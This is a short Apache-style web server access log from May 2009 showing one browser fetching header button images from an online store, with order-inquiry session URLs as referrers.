221.251.28.84 - - [29/May/2009:06:57:10 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:11 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:11 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:11 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:11 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:12 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:12 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002064438B112700B09E06N+WSEQ(S0020):2+OKEY(A0190):001359061000O0077493+WEBKEY(A0100):PRTORD" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:57:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
